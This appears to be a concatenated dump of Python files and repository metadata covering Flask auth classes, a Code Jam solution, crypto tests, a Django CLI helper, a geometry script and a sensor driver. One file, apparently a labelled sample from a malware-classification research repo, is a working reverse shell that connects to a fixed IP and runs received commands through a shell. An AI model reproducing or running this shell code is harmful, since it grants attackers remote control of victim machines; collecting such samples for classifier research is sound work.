class LoginProtectedResource(BaseResource):
    """Resource that requires valid login credentials; any authentication
    failure is logged and converted to a 403 before dispatch."""

    def dispatch_request(self, *args, **kwargs):
        message = None
        try:
            check_login()
        except (MissingAuthorizationHeaderException, UserNotFoundException,
                UserNotActiveException, InvalidPasswordException) as e:
            message = e.message
        if message is not None:
            print('[ERROR] LoginProtectedResource.dispatch_request() {}'.format(message))
            abort(403, message=message)
        return super(LoginProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class TokenProtectedResource(BaseResource):
    """Resource that requires a valid token via ``check_token()``."""

    def dispatch_request(self, *args, **kwargs):
        """Verify the request token before dispatching.

        Aborts with HTTP 403 (and logs the reason) on any token or user
        validation failure; otherwise delegates to the normal dispatch.
        """
        try:
            check_token()
        except (MissingAuthorizationHeaderException,
                SecretKeyNotFoundException,
                SecretKeyInvalidException,
                TokenDecodingFailedException,
                UserNotFoundException,
                UserNotActiveException) as e:
            # The original repeated six identical except-clauses; a single
            # tuple catch keeps the behavior and removes the duplication.
            print('[ERROR] TokenProtectedResource.dispatch_request() {}'.format(e.message))
            abort(403, message=e.message)
        return super(TokenProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class PermissionProtectedResource(TokenProtectedResource):
    """Token-protected resource with helpers for role/permission checks.

    NOTE: the method names below shadow the module-level functions imported
    at the top of the file (``check_admin``, ``check_permission``). Inside a
    method body a bare name resolves to the module global, not to the class,
    so the calls below hit the imported functions — confusing but correct.
    """
    def check_admin(self):
        # Superusers pass implicitly; otherwise the user must be an admin.
        try:
            check_superuser(self.current_user())
        except UserNotSuperUserException:
            try:
                check_admin(self.current_user())
            except UserNotAdminException as e:
                print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
                abort(403, message=e.message)
    def check_permission(self, permission):
        # Abort with 403 if the current user lacks `permission`.
        try:
            check_permission(self.current_user(), permission)
        except PermissionDeniedException as e:
            print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
            abort(403, message=e.message)
    def has_permission(self, permission):
        # Non-raising variant: returns a boolean instead of aborting.
        return has_permission(self.current_user(), permission)
|
[
"[email protected]"
] | |
89e8c2862eb94d0971d240632f6c974a62b9c46d
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5658282861527040_0/Python/xsot/b.py
|
837b18be5ec2789529bff938d391f3cd34053ff6
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 255 |
py
|
๏ปฟfor TC in range(1, int(raw_input()) + 1):  # Python 2: one loop per test case
    a, b, k = map(int, raw_input().split())
    ans = 0  # count of pairs (i, j), 0 <= i < a, 0 <= j < b, with i & j < k
    for i in range(a):
        for j in range(b):
            if i&j < k:  # bitwise AND below the threshold k
                ans += 1
    print "Case #%d: %d" % (TC, ans)
|
[
"[email protected]"
] | |
0682516f2179e263d15d82dac220ebb9ffc32e3a
|
575d197af5bbc31b89df37f8733e81707294948c
|
/testing/examples/pytest/average02/average.py
|
7712c0b8238a9ff4df9a5ca62e89b42e9e85eee6
|
[] |
no_license
|
tisnik/python-programming-courses
|
5c7f1ca9cae07a5f99dd8ade2311edb30dc3e088
|
4e61221b2a33c19fccb500eb5c8cdb49f5b603c6
|
refs/heads/master
| 2022-05-13T07:51:41.138030 | 2022-05-05T15:37:39 | 2022-05-05T15:37:39 | 135,132,128 | 3 | 2 | null | 2021-04-06T12:19:16 | 2018-05-28T08:27:19 |
Python
|
UTF-8
|
Python
| false | false | 158 |
py
|
"""Vรฝpoฤet prลฏmฤru."""
def average(x):
    """Return the arithmetic mean of the values in ``x``.

    Bug fix: the original divided by ``1 + len(x)``, which always skewed the
    result low. Raises ZeroDivisionError for an empty sequence.
    """
    return sum(x) / float(len(x))
|
[
"[email protected]"
] | |
4d0dac39959fe9af6b0ac34deb4b198a2b0eb6eb
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad239.py
|
a5aa6c4e78002837e16dae145993a43d6d06ef7e
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
py
|
import socket
import lzma
import subprocess
import crypt
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
|
[
"[email protected]"
] | |
54c53c759cd37e22b3b3f9b8db78a68f122b8701
|
e0660d7a6125bece559e1564921dd29fe0f1506c
|
/hexlistserver/forms/textarea.py
|
a1f2ae9adcfe4d66835f2d99a080a495476c179d
|
[] |
no_license
|
yvan/hexlistserver
|
ba0b661941549cfce1d5fd5a36ad908a9872238a
|
cf96508bc7b926eba469629254e4b5cc81470af3
|
refs/heads/master
| 2021-01-19T10:08:32.833174 | 2017-08-04T03:46:29 | 2017-08-04T03:46:29 | 55,884,098 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 294 |
py
|
from flask.ext.wtf import Form
from wtforms.fields import TextAreaField, SubmitField
from wtforms.validators import DataRequired
class TextareaForm(Form):
    """Form exposing a single required ``links`` textarea field."""
    links = TextAreaField('Links', validators=[DataRequired()], render_kw={"placeholder": "Put your links here..."})
'''
author @yvan
'''
|
[
"[email protected]"
] | |
f8146ab2ae40e6fc2848bac16c862804609f2c02
|
e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0
|
/venv/lib/python3.5/site-packages/eventlet/zipkin/http.py
|
668c3f9e380a1d9abd740ffae72959c8b26fde56
|
[
"MIT"
] |
permissive
|
LavanyaRamkumar/Networking-app_Dynamic-Quiz
|
4d5540088b1e2724626dda8df0fd83442391b40f
|
4de8329845712864d3cc8e8b81cfce5a1207224d
|
refs/heads/master
| 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 |
MIT
| 2023-02-02T04:48:55 | 2019-03-01T16:56:13 |
Python
|
UTF-8
|
Python
| false | false | 1,789 |
py
|
import warnings
from eventlet.support import six
from eventlet.green import httplib
from eventlet.zipkin import api
# see https://twitter.github.io/zipkin/Instrumenting.html
HDR_TRACE_ID = 'X-B3-TraceId'
HDR_SPAN_ID = 'X-B3-SpanId'
HDR_PARENT_SPAN_ID = 'X-B3-ParentSpanId'
HDR_SAMPLED = 'X-B3-Sampled'
if six.PY2:
__org_endheaders__ = httplib.HTTPConnection.endheaders
__org_begin__ = httplib.HTTPResponse.begin
def _patched_endheaders(self):
    """Replacement for ``HTTPConnection.endheaders``.

    When a trace is active, injects the Zipkin B3 headers (trace id, a fresh
    span id, the parent span id, and the sampled flag) and records a
    'Client Send' annotation, then delegates to the original method.
    """
    if api.is_tracing():
        trace_data = api.get_trace_data()
        new_span_id = api.generate_span_id()
        self.putheader(HDR_TRACE_ID, hex_str(trace_data.trace_id))
        self.putheader(HDR_SPAN_ID, hex_str(new_span_id))
        self.putheader(HDR_PARENT_SPAN_ID, hex_str(trace_data.span_id))
        self.putheader(HDR_SAMPLED, int(trace_data.sampled))
        api.put_annotation('Client Send')
    __org_endheaders__(self)
def _patched_begin(self):
    """Replacement for ``HTTPResponse.begin``: run the original, then record
    a 'Client Recv' annotation with the response status when tracing."""
    __org_begin__(self)
    if api.is_tracing():
        api.put_annotation('Client Recv (%s)' % self.status)
def patch():
    """Monkey-patch httplib so outgoing requests propagate Zipkin context.

    Python 2 only; on Python 3 a warning is emitted instead (per the message
    below, the thrift release in use does not support Python 3).
    """
    if six.PY2:
        httplib.HTTPConnection.endheaders = _patched_endheaders
        httplib.HTTPResponse.begin = _patched_begin
    if six.PY3:
        warnings.warn("Since current Python thrift release \
doesn't support Python 3, eventlet.zipkin.http \
doesn't also support Python 3 (http.client)")
def unpatch():
    """Restore the original httplib methods saved at import time.

    No-op on Python 3, where ``patch()`` never modified anything.
    """
    if six.PY2:
        httplib.HTTPConnection.endheaders = __org_endheaders__
        httplib.HTTPResponse.begin = __org_begin__
    if six.PY3:
        pass
def hex_str(n):
    """Render a trace/span id as the 16-digit, zero-padded, lowercase hex
    string used in B3 HTTP headers (Thrift carries the same id in binary)."""
    return "%0.16x" % n
|
[
"[email protected]"
] | |
be328f37bac951c2c72b62235422e71d7b99017c
|
a2fae6522c0526e81032d700e750dbc4b55e308b
|
/twemoir/lib/states2/__init__.py
|
ad34e59f727359c8bb1bafd873c6013ba561029b
|
[
"BSD-2-Clause"
] |
permissive
|
fish2000/django-twemoir
|
e895039e4ecd0a01baa9e35002fe0e00e20f6a4f
|
8caa7e5319055f54e0d89457780605994622e8d9
|
refs/heads/master
| 2020-06-05T13:16:47.036385 | 2014-01-21T02:42:30 | 2014-01-21T02:42:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 601 |
py
|
'''
State engine for django models.
Define a state graph for a model and remember the state of each object.
State transitions can be logged for objects.
'''
#: The version list
VERSION = (1, 4, 4)


def get_version():
    '''
    Converts the :attr:`VERSION` into a nice string
    '''
    base = '.'.join(str(part) for part in VERSION[:3])
    # A fourth element such as 'beta' is appended, unless it is 'final'/''.
    if len(VERSION) > 3 and VERSION[3] not in ('final', ''):
        return '%s %s' % (base, VERSION[3])
    return base


#: The actual version number, used by python (and shown in sentry)
__version__ = get_version()
|
[
"[email protected]"
] | |
46b1e5157ab927f5cf441af52490723e1d448632
|
d452e34253561a47b974e260dabd8dcda6e750a2
|
/unsupervised_learning/0x00-dimensionality_reduction/0-pca.py
|
739e7c1866a674e0f51ec93dfdd3ee6b953d63c2
|
[] |
no_license
|
JohnCook17/holbertonschool-machine_learning
|
57fcb5b9d351826c3e3d5478b3b4fbe16cdfac9f
|
4200798bdbbe828db94e5585b62a595e3a96c3e6
|
refs/heads/master
| 2021-07-07T10:16:21.583107 | 2021-04-11T20:38:33 | 2021-04-11T20:38:33 | 255,424,823 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 513 |
py
|
#!/usr/bin/env python3
"""PCA of an array to reduce the number of features"""
import numpy as np
def pca(X, var=0.95):
    """performs pca on a matrix"""
    # Eigendecomposition of the Gram matrix X^T X (rows = samples,
    # columns = features — TODO confirm orientation with callers).
    W, V = np.linalg.eig(np.matmul(X.T, X))
    # Order eigenvectors by descending eigenvalue.
    W_idx = W.argsort()[::-1]
    V = V[:, W_idx]
    # print(V)
    # Normalise loadings so the largest magnitude entry is 1.
    V_var = np.copy(V)
    V_var *= 1 / np.abs(V_var).max()
    # print(V_var)
    # NOTE(review): `var` (default 0.95) is compared against normalised
    # loadings here, not against cumulative explained variance as the
    # parameter name suggests — confirm this selection rule is intended.
    V_idx = V[np.where(np.abs(V_var) >= var, True, False)]
    # print(V_idx.shape)
    # Number of retained components = number of entries passing the test.
    V_idx = len(V_idx)
    # print(V[:, :V_idx].shape)
    # Sign flip applied to all retained components before returning.
    return V[:, :V_idx] * -1.
|
[
"[email protected]"
] | |
46c61bb76012d57e00ff1f1e762fe9ef6c1731eb
|
95fd6bb4126edbd36a79ba87b8cb4f0e2149e4e1
|
/tests/test_pyca.py
|
bdab377dc1090dbe408f12da0b97db5995796cc4
|
[
"MIT"
] |
permissive
|
secondguard/secondguard-python
|
a091357932ffa55e0bae74149c552781d87a3493
|
392d33ee40a9982ad912210152f4b2d44fa5ef1a
|
refs/heads/master
| 2022-12-10T11:31:31.972938 | 2020-08-04T16:23:47 | 2020-08-04T16:23:47 | 277,826,214 | 6 | 1 |
MIT
| 2022-12-08T11:05:21 | 2020-07-07T13:36:49 |
Python
|
UTF-8
|
Python
| false | false | 1,416 |
py
|
from base64 import b64decode
from os import urandom
from secondguard.pyca import (
symmetric_encrypt,
symmetric_decrypt,
asymmetric_encrypt,
asymmetric_decrypt,
)
# TODO: move to a setup class?
from tests.utils import PUBKEY_STR, PRIVKEY_STR, _fetch_testing_pubkey
# TODO: come up with less HACKey way to test many times
# TODO: add static decrypt test vectors
def perform_symmetric_encryption_decryption(num_bytes=1000):
    """Round-trip ``num_bytes`` of random data through the symmetric
    encrypt/decrypt pair and assert the plaintext is recovered exactly."""
    secret = urandom(num_bytes)
    ciphertext, key = symmetric_encrypt(secret)
    recovered_secret = symmetric_decrypt(ciphertext=ciphertext, key=key)
    assert secret == recovered_secret
def test_symmetric(cnt=100):
    """Exercise the symmetric round-trip across a range of payload sizes
    (0, 100, 200, ... bytes)."""
    for size_step in range(cnt):
        perform_symmetric_encryption_decryption(num_bytes=size_step * 100)
def perform_asymmetric_encryption_decryption(rsa_privkey, rsa_pubkey, secret):
    """Round-trip ``secret`` through RSA encrypt/decrypt with the given keys.

    Bug fix: the original ignored its ``rsa_privkey``/``rsa_pubkey``
    parameters and always used the module-level PUBKEY_STR/PRIVKEY_STR
    constants, so callers could never test a different keypair.
    """
    ciphertext_b64 = asymmetric_encrypt(bytes_to_encrypt=secret, rsa_pubkey=rsa_pubkey)
    # Ciphertext length check carried over from the original.
    assert len(b64decode(ciphertext_b64)) == 512
    recovered_secret = asymmetric_decrypt(
        ciphertext_b64=ciphertext_b64, rsa_privkey=rsa_privkey
    )
    assert secret == recovered_secret
def test_asymmetric(cnt=10):
    """Run the asymmetric round-trip several times with fresh random
    secrets."""
    for _round in range(cnt):
        # This represents the info you're trying to protect:
        payload = urandom(64)
        perform_asymmetric_encryption_decryption(
            rsa_privkey=PRIVKEY_STR, rsa_pubkey=PUBKEY_STR, secret=payload
        )
|
[
"[email protected]"
] | |
52cd7955d3433c7db048edb55152a09ae1c047f1
|
d1a380bbf6e290edbb1b6ac62d4d9f8c0c8f80f1
|
/django_shorts.py
|
e3ea9f278376d6929fb2db1515603b5ce78a2d0f
|
[
"MIT"
] |
permissive
|
mhadiahmed/django-shorts
|
6310bf12812fab2bd4283e50ec57416b473eeff4
|
3803992455bda14e7f20327d22583c6d064fe0aa
|
refs/heads/main
| 2023-03-17T10:11:09.655564 | 2021-03-07T09:49:28 | 2021-03-07T09:49:28 | 345,284,896 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,096 |
py
|
#!/usr/bin/env python
import os
import sys
from subprocess import call
ALIASES = {
# Django
'c' : 'collectstatic',
'r' : 'runserver',
'sd' : 'syncdb',
'sp' : 'startproject',
'sa' : 'startapp',
't' : 'test',
# Shell
'd' : 'dbshell',
's' : 'shell',
# Auth
'csu': 'createsuperuser',
'cpw': 'changepassword',
# South
'm' : 'migrate',
'mkm' : 'makemigrations',
# session
'cs' : 'clearsessions',
# # Haystack
# 'ix' : 'update_index',
# 'rix': 'rebuild_index',
# # Django Extensions
# 'sk' : 'generate_secret_key',
# 'rdb': 'reset_db',
# 'rp' : 'runserver_plus',
# 'shp': 'shell_plus',
# 'url': 'show_urls',
# 'gm' : 'graph_models',
# 'rs' : 'runscript'
}
def run(command=None, *arguments):
    """
    Run the given command.

    Parameters:
    :param command: A string describing a command.
    :param arguments: A list of strings describing arguments to the command.
    """
    if command is None:
        sys.exit('django-shorts: No argument was supplied, please specify one.')

    # Expand short aliases; unknown names pass through unchanged.
    command = ALIASES.get(command, command)

    if command == 'startproject':
        return call('django-admin.py startproject {}'.format(' '.join(arguments)), shell=True)

    # Walk up from the current directory until manage.py is found.
    script_path = os.getcwd()
    while not os.path.exists(os.path.join(script_path, 'manage.py')):
        parent_dir = os.path.dirname(script_path)
        if parent_dir == script_path:
            # Reached the filesystem root without finding manage.py.
            sys.exit("django-shorts: No 'manage.py' script found in this directory or its parents.")
        script_path = parent_dir

    return call('{python} {script_path} {command} {arguments}'.format(
        python=sys.executable,
        script_path=os.path.join(script_path, 'manage.py'),
        command=command or '',
        arguments=' '.join(arguments),
    ), shell=True)
def main():
    """Command-line entry point: forward argv to run() and exit with its
    status; a Ctrl-C exits quietly."""
    cli_args = sys.argv[1:]
    try:
        status = run(*cli_args)
    except KeyboardInterrupt:
        sys.exit()
    sys.exit(status)
sys.exit()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f6b28f22787ec511d9b652e833c2e15d3cb09928
|
275e770eaf9708e31d50dd62857fc52716e985af
|
/python/python/widget/oval progam.py
|
ff91cbe45a3d2fcd1111dcb9c0ae22b635ba724c
|
[
"MIT"
] |
permissive
|
priyamshah112/Basic_Python
|
75127744a6a25c72d2eba8e399e920509bd17ee2
|
11447cf062209de750fbe938402d738b1a5ff76c
|
refs/heads/master
| 2021-10-10T15:43:50.151891 | 2019-01-13T13:46:40 | 2019-01-13T13:46:40 | 106,164,530 | 0 | 0 | null | 2018-10-10T19:07:16 | 2017-10-08T09:31:29 |
Python
|
UTF-8
|
Python
| false | false | 182 |
py
|
from tkinter import *

# Canvas dimensions in pixels.
canvas_width = 190
canvas_height = 150

root = Tk()
canvas = Canvas(root, width=canvas_width, height=canvas_height)
canvas.pack()
# Draw an oval inscribed in the bounding box (50, 50)-(100, 100).
canvas.create_oval(50, 50, 100, 100)
mainloop()
|
[
"[email protected]"
] | |
2c161ca9efa8d4b256b9cbf48c804dc8659b5b10
|
1086ef8bcd54d4417175a4a77e5d63b53a47c8cf
|
/Forks/uvapy-master/geometry/p10005.py
|
22919427968cb78efca83f85a7629ab024461bf1
|
[
"MIT"
] |
permissive
|
wisdomtohe/CompetitiveProgramming
|
b883da6380f56af0c2625318deed3529cb0838f6
|
a20bfea8a2fd539382a100d843fb91126ab5ad34
|
refs/heads/master
| 2022-12-18T17:33:48.399350 | 2020-09-25T02:24:41 | 2020-09-25T02:24:41 | 298,446,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,600 |
py
|
from math import isclose
class Circle:
    """Circle constructed from three points on its boundary.

    Points may be objects exposing ``.x``/``.y`` attributes or plain
    ``(x, y)`` sequences. Bug fix: the original accepted only attribute
    access, which crashed on the tuple points this script actually builds.
    """

    def __init__(self, **kwargs):
        if "p1" in kwargs and "p2" in kwargs and "p3" in kwargs:
            self.from_three_points(kwargs["p1"], kwargs["p2"], kwargs["p3"])
        # elif "c" in kwargs and "r" in kwargs:
        #     self.from_center_radius(kwargs["c"], kwargs["r"])
        else:
            raise ValueError("Unknown constructor called: {}".format(kwargs.keys()))

    @staticmethod
    def _xy(p):
        # Accept both attribute-style points and (x, y) sequences.
        try:
            return p.x, p.y
        except AttributeError:
            return p[0], p[1]

    def from_three_points(self, p1, p2, p3):
        """Set ``self.c`` (center tuple) and ``self.r`` (radius) of the
        circle through p1, p2, p3; raises ValueError for collinear points."""
        (x1, y1), (x2, y2), (x3, y3) = self._xy(p1), self._xy(p2), self._xy(p3)
        # Avoid a vertical first chord by swapping points 1 and 3.
        if isclose(x1, x2):
            (x1, y1), (x3, y3) = (x3, y3), (x1, y1)
        mr = (y2 - y1) / (x2 - x1)
        # Avoid a vertical second chord by swapping points 1 and 2
        # (mr above was already computed with the original ordering).
        if isclose(x2, x3):
            (x1, y1), (x2, y2) = (x2, y2), (x1, y1)
        mt = (y3 - y2) / (x3 - x2)
        if isclose(mr, mt):
            raise ValueError("No such circle exists.")
        x = (mr * mt * (y3 - y1) + mr * (x2 + x3) - mt * (x1 + x2)) / (2 * (mr - mt))
        y = (y1 + y2) / 2 - (x - (x1 + x2) / 2) / mr
        radius = pow(pow(x2 - x, 2) + pow(y2 - y, 2), 0.5)
        self.c = (x, y)
        self.r = radius
while True:
    # Number of polygon vertices; a 0 terminates the input.
    n = int(input())
    if n == 0:
        break
    points = []
    for i in range(n):
        # Each vertex is an (x, y) integer tuple.
        p = tuple(map(int, input().split()))
        points.append(p)
    # Radius of the target circle.
    r = float(input())
    if n == 1:
        # Always feasible to embed a point in a circle (r == 0?)
        print("The polygon can be packed in the circle.")
    elif n == 2:
        # Two points fit iff their squared distance is at most the
        # squared diameter (compared without taking square roots).
        dist_l2 = (points[1][0] - points[0][0]) ** 2 + (points[1][1] - points[0][1])**2
        if dist_l2 <= (r+r)**2:
            print("The polygon can be packed in the circle.")
        else:
            print("There is no way of packing that polygon.")
    else:
        # Find a circle that passes through first three points
        # NOTE(review): `points` holds plain tuples, but Circle.from_three_points
        # above reads `.x`/`.y` attributes — as written this call raises
        # AttributeError; confirm the intended point representation.
        c = Circle(p1 = points[0], p2 = points[1], p3 = points[2])
|
[
"[email protected]"
] | |
1336aaa3cf00acaea477d1715361e818158c5ce9
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/TAhuay457cw5AekBe_5.py
|
91d14e284af645ac11d85fa441299abdbfccac66
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 341 |
py
|
from re import sub
vowels = {"a", "e", "i", "o", "u", "A", "E", "I", "O", "U"}


def monkey_talk(txt):
    """Turn every word into monkey noise — 'eek' for vowel-initial words,
    'ook' otherwise — capitalise a leading noise, and append a full stop."""
    def noise(match):
        # First letter decides the noise.
        return "eek" if match.group()[0] in vowels else "ook"

    noises = sub(r"[A-Za-z]+", noise, txt)
    capitalised = sub(r"^[eo]", lambda m: m.group().upper(), noises)
    return capitalised + "."
|
[
"[email protected]"
] | |
1cedde77ae394ba32a9d083fb8ec824a480ef2c5
|
6974096eaf642a1c3dfbc4567d0f0776621261de
|
/setup.py
|
2eea792aa201ef462b7a712aa3ca336ef13a4f22
|
[
"Apache-2.0"
] |
permissive
|
thrrgilag/pantalaimon
|
29709e1231db7655e57685babad27094f68afe5c
|
d388a21b9b1f17b7f52790f79dd571d8e75a4543
|
refs/heads/master
| 2022-11-13T12:56:14.747072 | 2020-07-02T10:19:59 | 2020-07-02T10:19:59 | 277,380,106 | 0 | 0 |
Apache-2.0
| 2020-07-05T20:41:57 | 2020-07-05T20:41:56 | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
# Long description for PyPI comes straight from the README.
with open("README.md", encoding="utf-8") as f:
    long_description = f.read()

setup(
    name="pantalaimon",
    version="0.6.5",
    url="https://github.com/matrix-org/pantalaimon",
    author="The Matrix.org Team",
    author_email="[email protected]",
    description=("A Matrix proxy daemon that adds E2E encryption "
                 "capabilities."),
    long_description=long_description,
    long_description_content_type="text/markdown",
    license="Apache License, Version 2.0",
    packages=find_packages(),
    install_requires=[
        "attrs >= 19.3.0",
        "aiohttp >= 3.6, < 4.0",
        "appdirs >= 1.4.4",
        "click >= 7.1.2",
        "keyring >= 21.2.1",
        "logbook >= 1.5.3",
        "peewee >= 3.13.1",
        "janus >= 0.5",
        # Bug fix: the original omitted the comma after this entry, so
        # implicit string concatenation fused the two requirements into the
        # bogus specifier "cachetools >= 3.0.0prompt_toolkit>2<4".
        "cachetools >= 3.0.0",
        "prompt_toolkit>2<4",
        "typing;python_version<'3.5'",
        "matrix-nio[e2e] >= 0.14, < 0.15"
    ],
    extras_require={
        "ui": [
            "dbus-python <= 1.2",
            "PyGObject <= 3.36",
            "pydbus <= 0.6",
            "notify2 <= 0.3",
        ]
    },
    entry_points={
        "console_scripts": ["pantalaimon=pantalaimon.main:main",
                            "panctl=pantalaimon.panctl:main"],
    },
    zip_safe=False
)
|
[
"[email protected]"
] | |
5699dafae03660ced229e5fb381de892c3f83a6d
|
c4f7b067dbf9efa404d446453cdf2b0839d33fe1
|
/src/sensorrunner/devices/SPI/ADC/device.py
|
48e20b4d57883c0fadef06f30a025389e38cda66
|
[] |
no_license
|
JackBurdick/sensorrunner
|
90e05e35381363ad28301b0e28579372fd78c179
|
506772d2ec4887b3890e4555b66bf5548910d020
|
refs/heads/master
| 2023-07-02T18:26:21.418501 | 2021-02-22T02:27:04 | 2021-02-22T02:27:04 | 298,879,591 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,386 |
py
|
from sensorrunner.devices.sensor.SPI.ADC.light.pt19 import PT19
from gpiozero import MCP3008, Device
# from gpiozero.pins.mock import MockFactory
from gpiozero.pins.native import NativeFactory
Device.pin_factory = NativeFactory()
class MDC3800:
    """Board wrapper around an MCP3008 SPI ADC hosting analog sensors
    (currently only the PT19 light sensor is allowed).

    Builds one shared MCP3008 instance per ADC channel, binds each configured
    device to a read function, and can emit schedule-entry dicts for the
    task runner.
    """
    def __init__(
        self,
        name,
        # devices
        devices_dict,
    ):
        # NOTE(review): the `name` parameter is shadowed by the loop variable
        # below and thus effectively unused — confirm intent.
        # NOTE: accepting tuples currently because I'm not sure what the config
        # will look like yet
        # "fn": None --> resort to default fn
        self.ALLOWED_DEVICES = {"pt19": {"device_class": PT19, "fn": None}}
        # connected = (name, address, channel, device, fn)
        if devices_dict is None:
            raise ValueError("no devices specified in `device_dict`")
        # TODO: assure pins are valid/acceptable
        # light = MCP3008(channel=0, clock_pin=11, mosi_pin=10, miso_pin=9,
        # select_pin=8)
        # TODO: ensure channel 0-8
        # One MCP3008 object per ADC channel, shared by devices on that channel.
        channel_to_device = {}
        devices = {}
        for name, dd in devices_dict.items():
            devices[name] = {}
            cur_dev_class = self.ALLOWED_DEVICES[dd["device_type"]]["device_class"]
            if dd["channel"] not in channel_to_device:
                # SPI pins are hard-coded: clock 11, MOSI 10, MISO 9, CS 8.
                channel_to_device[dd["channel"]] = MCP3008(
                    channel=dd["channel"],
                    clock_pin=11,
                    mosi_pin=10,
                    miso_pin=9,
                    select_pin=8,
                )
            cur_device = channel_to_device[dd["channel"]]
            cur_device_obj = cur_dev_class(cur_device)
            # TODO: this really isn't a device_type but a device_object - same
            # in I2C
            devices[name]["device_type"] = cur_device_obj
            # Public callables on the raw ADC channel, used to validate fn_name.
            available_fns = [
                f
                for f in dir(cur_device)
                if callable(getattr(cur_device, f)) and not f.startswith("_")
            ]
            try:
                dev_fn = dd["fn_name"]
            except KeyError:
                dev_fn = None
            if dev_fn is not None:
                if dev_fn not in available_fns:
                    raise ValueError(
                        f"specified fn ({dev_fn}) for {name} not available for {cur_device}.\n"
                        f"please select from {available_fns}"
                    )
                fn_name = dev_fn
            else:
                # Default read function when none is configured.
                fn_name = "return_value"
            try:
                devices[name]["fn"] = getattr(devices[name]["device_type"], fn_name)
            except KeyError:
                raise ValueError(
                    f"specified fn ({fn_name}) for {name} not available for {cur_device}.\n"
                    f"please select from {available_fns}"
                )
        self.devices = devices
    def return_value(self, name, params):
        # Call the configured read function of device `name`, passing `params`
        # as keyword arguments when present.
        # NOTE(review): the two validation failures below *return* ValueError
        # instances instead of raising them — confirm whether `raise` was
        # intended.
        if name is None:
            return ValueError(
                f"no name specified. please select from {self.devices.keys()}"
            )
        if not isinstance(name, str):
            return ValueError(f"`name` is expected to be type {str}, not {type(name)}")
        try:
            dev_d = self.devices[name]
        except KeyError:
            raise ValueError(
                f"{name} is not available. please select from {self.devices.keys()}"
            )
        if params:
            value = dev_d["fn"](**params)
        else:
            # TODO: try
            value = dev_d["fn"]()
        return value
    @staticmethod
    def build_task_params(device_name, device_dict):
        """
        dist0 = Entry(
            "run_dist_0",
            "tasks.iic.tasks.dist_select",
            schedule=celery.schedules.schedule(run_every=2),
            kwargs={},
            app=celery_app.app,
        )
        # name=None, task=None, schedule=None, kwargs, app
        {
            "env_a": {
                "channel": 2,
                "address": 114,
                "device_type": "si7021",
                "params": {"run": {"unit": "f"}, "schedule": {"frequency": 1800.0}},
                "fn_name": None,
            },
            "dist_a": {
                "channel": 0,
                "address": 112,
                "device_type": "vl53l0x",
                "params": {"run": {"unit": "in"}, "schedule": {"frequency": 1800.0}},
                "fn_name": None,
            },
        }
        """
        # Build one schedule-entry spec per component in `device_dict`.
        DEFAULT_FN_NAME = "return_value"
        entry_specs = {}
        for comp_name, comp_dict in device_dict.items():
            dev_dict = comp_dict.copy()
            entry_d = {}
            fn_name = comp_dict["fn_name"]
            if fn_name is None:
                fn_name = DEFAULT_FN_NAME
            # Entry name encodes board, component, and the read function.
            entry_d["name"] = f"{device_name}_{comp_name}_{fn_name}"
            # TODO: make more robust
            entry_d["task"] = "sensorrunner.tasks.devices.MDC3800.tasks.MDC3800_run"
            # maybe make schedule outside this?
            entry_d["run_every"] = comp_dict["params"]["schedule"]["frequency"]
            if not isinstance(dev_dict, dict):
                raise ValueError(
                    f"run params ({dev_dict}) expected to be type {dict}, not {type(dev_dict)}"
                )
            # add component name
            dev_dict["name"] = comp_name
            entry_d["kwargs"] = {"dev_dict": dev_dict}
            entry_specs[comp_name] = entry_d
        return entry_specs
|
[
"[email protected]"
] | |
eb1babf920093b006230d7ec6c101e59b897093d
|
cf91f1a6354ba7a803af8382e0ef8bde6175845e
|
/tests/test_with.py
|
1fd2a1f616ddef483c4ca7b17a027e7e1cd824b0
|
[] |
permissive
|
mueslo/python-progressbar
|
a230dc1be0af48015215d10a6b21e1d15005ccb4
|
5621a26b51cddc3ce3f2b62a9e32a28eb60a2f84
|
refs/heads/master
| 2022-11-10T18:23:08.242413 | 2020-06-25T19:36:56 | 2020-06-25T19:36:56 | 275,635,088 | 0 | 0 |
BSD-3-Clause
| 2020-06-28T17:29:57 | 2020-06-28T17:29:56 | null |
UTF-8
